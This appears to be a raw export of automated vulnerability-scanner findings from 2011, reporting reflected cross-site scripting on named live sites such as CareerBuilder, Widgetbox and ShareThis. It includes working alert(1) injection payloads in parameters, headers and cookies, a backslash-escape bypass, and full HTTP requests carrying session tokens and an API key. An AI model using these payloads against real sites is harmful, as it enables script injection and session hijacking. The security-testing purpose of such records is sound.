HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 21:48:25 GMT Server: Apache/2.2.3 (Red Hat) Expires: Sun, 7 May 1995 12:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache X-UA-Compatible: chrome=1 Vary: Accept-Encoding P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 15273
The value of the siteConfig request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e0f6b%3balert(1)//b7e51f302787001e0 was submitted in the siteConfig parameter. This input was echoed as e0f6b;alert(1)//b7e51f302787001e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe?widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile%20Web%20App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0%20%28windows%3B%20u%3B%20windows%20nt%206.1%3B%20en-us%29%20applewebkit%2F534.16%20%28khtml%2C%20like%20gecko%29%20chrome%2F10.0.648.205%20safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830&siteConfig=%7B%22icon%22%3A%22%22%2C%22phoneIcon%22%3A%22%22%2C%22tabletIcon%22%3A%22%22%2C%22startupImg%22%3A%22%22%2C%22tabletStartupImg%22%3A%22%22%2C%22headerImg%22%3A%22%22%2C%22navStyle%22%3A%22bottomNav%22%2C%22aboutImg%22%3A%22%22%2C%22aboutText%22%3A%22Made+with+Widgetbox+Mobile.%22%2C%22titleStyle%22%3A%22siteTitleText%22%2C%22titleImg%3A%22%3A%22%22%2C%22themeColor%22%3A%22%22%2C%22theme%22%3A%2201%22%2C%22themeGuid%22%3A%226f55c53b-4089-4776-bcb9-135b52609c75%22%2C%22font%22%3A%7B%22primary%22%3A%22sans-serif%22%2C%22secondary%22%3A%22sans-serif%22%2C%22titleColor%22%3A%22%22%2C%22primaryColor%22%3A%22%22%2C%22secondaryColor%22%3A%22%22%2C%22title%22%3A%22sans-serif%22%7D%2C%22admobAcct%22%3A%22%22%2C%22showAds%22%3A%22false%22%2C%22showInstallTip%22%3A%22true%22%2C%22pageConfigs%22%3A%5B%5D%2C%22themeImage%22%3A%22%22%7De0f6b%3balert(1)//b7e51f302787001e0&vars=&lib.mobileCssSrc=%2Fmobile%2Fx%2Fcss%2Fpreview.css&wbxPa
gePath=&pages=%5B%5D&isInstallable=true&pageIds=%5B%5D&wbxPageTitle=New+App&lib.mobileScriptSrc=%2Fmobilejs%2Fmapp_future.js&wbx_in_editor=%5Bobject+Object%5D&__cb=1303854400438&widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile+Web+App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0+%28windows%3B+u%3B+windows+nt+6.1%3B+en-us%29+applewebkit%2F534.16+%28khtml%2C+like+gecko%29+chrome%2F10.0.648.205+safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830 HTTP/1.1 Host: www.widgetserver.com Proxy-Connection: keep-alive Cache-Control: max-age=0 Origin: http://www.widgetbox.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 21:48:20 GMT Server: Apache/2.2.3 (Red Hat) Expires: Sun, 7 May 1995 12:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache X-UA-Compatible: chrome=1 Vary: Accept-Encoding P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 11098
The value of the wbxPageTitle request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f3c8"%3balert(1)//c8b66430a224ecbcd was submitted in the wbxPageTitle parameter. This input was echoed as 3f3c8";alert(1)//c8b66430a224ecbcd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe?widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile%20Web%20App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0%20%28windows%3B%20u%3B%20windows%20nt%206.1%3B%20en-us%29%20applewebkit%2F534.16%20%28khtml%2C%20like%20gecko%29%20chrome%2F10.0.648.205%20safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830&siteConfig=%7B%22icon%22%3A%22%22%2C%22phoneIcon%22%3A%22%22%2C%22tabletIcon%22%3A%22%22%2C%22startupImg%22%3A%22%22%2C%22tabletStartupImg%22%3A%22%22%2C%22headerImg%22%3A%22%22%2C%22navStyle%22%3A%22bottomNav%22%2C%22aboutImg%22%3A%22%22%2C%22aboutText%22%3A%22Made+with+Widgetbox+Mobile.%22%2C%22titleStyle%22%3A%22siteTitleText%22%2C%22titleImg%3A%22%3A%22%22%2C%22themeColor%22%3A%22%22%2C%22theme%22%3A%2201%22%2C%22themeGuid%22%3A%226f55c53b-4089-4776-bcb9-135b52609c75%22%2C%22font%22%3A%7B%22primary%22%3A%22sans-serif%22%2C%22secondary%22%3A%22sans-serif%22%2C%22titleColor%22%3A%22%22%2C%22primaryColor%22%3A%22%22%2C%22secondaryColor%22%3A%22%22%2C%22title%22%3A%22sans-serif%22%7D%2C%22admobAcct%22%3A%22%22%2C%22showAds%22%3A%22false%22%2C%22showInstallTip%22%3A%22true%22%2C%22pageConfigs%22%3A%5B%5D%2C%22themeImage%22%3A%22%22%7D&vars=&lib.mobileCssSrc=%2Fmobile%2Fx%2Fcss%2Fpreview.css&wbxPagePath=&pages=%5B%5D&isInstallable=
true&pageIds=%5B%5D&wbxPageTitle=New+App3f3c8"%3balert(1)//c8b66430a224ecbcd&lib.mobileScriptSrc=%2Fmobilejs%2Fmapp_future.js&wbx_in_editor=%5Bobject+Object%5D&__cb=1303854400438&widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile+Web+App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0+%28windows%3B+u%3B+windows+nt+6.1%3B+en-us%29+applewebkit%2F534.16+%28khtml%2C+like+gecko%29+chrome%2F10.0.648.205+safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830 HTTP/1.1 Host: www.widgetserver.com Proxy-Connection: keep-alive Cache-Control: max-age=0 Origin: http://www.widgetbox.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 21:48:29 GMT Server: Apache/2.2.3 (Red Hat) Expires: Sun, 7 May 1995 12:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache X-UA-Compatible: chrome=1 Vary: Accept-Encoding P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 15150
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59e63"-alert(1)-"6ad0caf2cf8 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title> ...[SNIP]... ion','ordernumber') : unknown record type null]------&_exc="+exceptionInfo+"-----Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.1659e63"-alert(1)-"6ad0caf2cf8"); } }; </script> ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript rest-of-line comment. The payload f43cc</script><script>alert(1)</script>3f14fd6293f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title> ...[SNIP]... ptlet.nl?script=94&deploy=1&compid=1142057&h=f5940e0c3bb4a600755b&_orderNo=&_exc=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16f43cc</script><script>alert(1)</script>3f14fd6293f"); /* another GA account UA-22755206-1 */ var pageTracker1 = _gat._getTracker("UA-22755206-1"); pageTracker1._setDomainName("none"); pageTracker1._setAllowLinker(true); pageTracker1 ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75715\'%3balert(1)//8dbcb7e0cd9 was submitted in the Referer HTTP header. This input was echoed as 75715\\';alert(1)//8dbcb7e0cd9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /iframe/recommendedcvupload.aspx?pagever=NewMSN HTTP/1.1 Host: www.careerbuilder.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=75715\'%3balert(1)//8dbcb7e0cd9 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CB%5FSID=66ee7709ffa3453389de6128eeb18875-357143948-w4-6; BID=X1B5CE6DB054A3B8D64198121F94D45E247F1DE3EBA3E204F258F8D2F5D9E98B1FB41E77395140550B900D87EFE23B4943
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" X-Powered-By: ASP.NET X-PBY: REBEL52 Date: Tue, 26 Apr 2011 18:43:23 GMT Connection: close Content-Length: 45799
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Find J ...[SNIP]... .careerbuilder.com/iframe/recommendedcvupload.aspx'; s_cb.server='www'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 75715\\';alert(1)//8dbcb7e0cd9'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the a cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c028f"><script>alert(1)</script>de5d22cc79e was submitted in the a cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the a1 cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30897"><script>alert(1)</script>7ab7a776cb7 was submitted in the a1 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload abbaf<script>alert(1)</script>94d12c45380 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 60dd7<script>alert(1)</script>dccd8ad0c81 was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 896ae<script>alert(1)</script>4b73efe183f was submitted in the UID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload c3e3b<script>alert(1)</script>be3830adad1 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload b9d14<script>alert(1)</script>610a34ff3d4 was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p91136705 cookie is copied into the HTML document as plain text between tags. The payload b4cb4<script>alert(1)</script>942e4e48996 was submitted in the ar_p91136705 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload d7644<script>alert(1)</script>88902fd901f was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p92429851 cookie is copied into the HTML document as plain text between tags. The payload 6fac2<script>alert(1)</script>42593258a81 was submitted in the ar_p92429851 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload 86eb2<script>alert(1)</script>7f5234ca961 was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_s_p81479006 cookie is copied into the HTML document as plain text between tags. The payload d9b4a<script>alert(1)</script>cfcd3ff335d was submitted in the ar_s_p81479006 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 4bf4e<script>alert(1)</script>14929ac7093 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /getSegment.php?purl=http%3A%2F%2Fwww.computerworlduk.com%2Fnews%2Fsecurity%2F3276305%2Foracle-responds-to-hacker-group-and-patches-javacom-vulnerability%2F%3Folo%3Drss&jsref=&rnd=1303854579845 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==4bf4e<script>alert(1)</script>14929ac7093; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1
Response
HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Tue, 26 Apr 2011 21:51:26 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc738"-alert(1)-"79350713e7 was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta c ...[SNIP]... ascript'> var R3_COMMON = new r3_common(); R3_COMMON.setApiKey("756bd9ec9a083c52"); R3_COMMON.setBaseUrl("http://recs.richrelevance.com/rrserver/"); R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwndc738"-alert(1)-"79350713e7"); R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}");
The value of the anonymous_userid_1 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7942c"-alert(1)-"151728b75d8 was submitted in the anonymous_userid_1 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e120e"-alert(1)-"301dcb340ea34b3b7 was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta c ...[SNIP]... ascript'> var R3_COMMON = new r3_common(); R3_COMMON.setApiKey("756bd9ec9a083c52"); R3_COMMON.setBaseUrl("http://recs.richrelevance.com/rrserver/"); R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwne120e"-alert(1)-"301dcb340ea34b3b7"); R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}");
The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3753"-alert(1)-"1bbca0be6e9 was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta c ...[SNIP]... ascript'> var R3_COMMON = new r3_common(); R3_COMMON.setApiKey("756bd9ec9a083c52"); R3_COMMON.setBaseUrl("http://recs.richrelevance.com/rrserver/"); R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwne3753"-alert(1)-"1bbca0be6e9"); R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}");
The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61497"-alert(1)-"12b550c25c9 was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
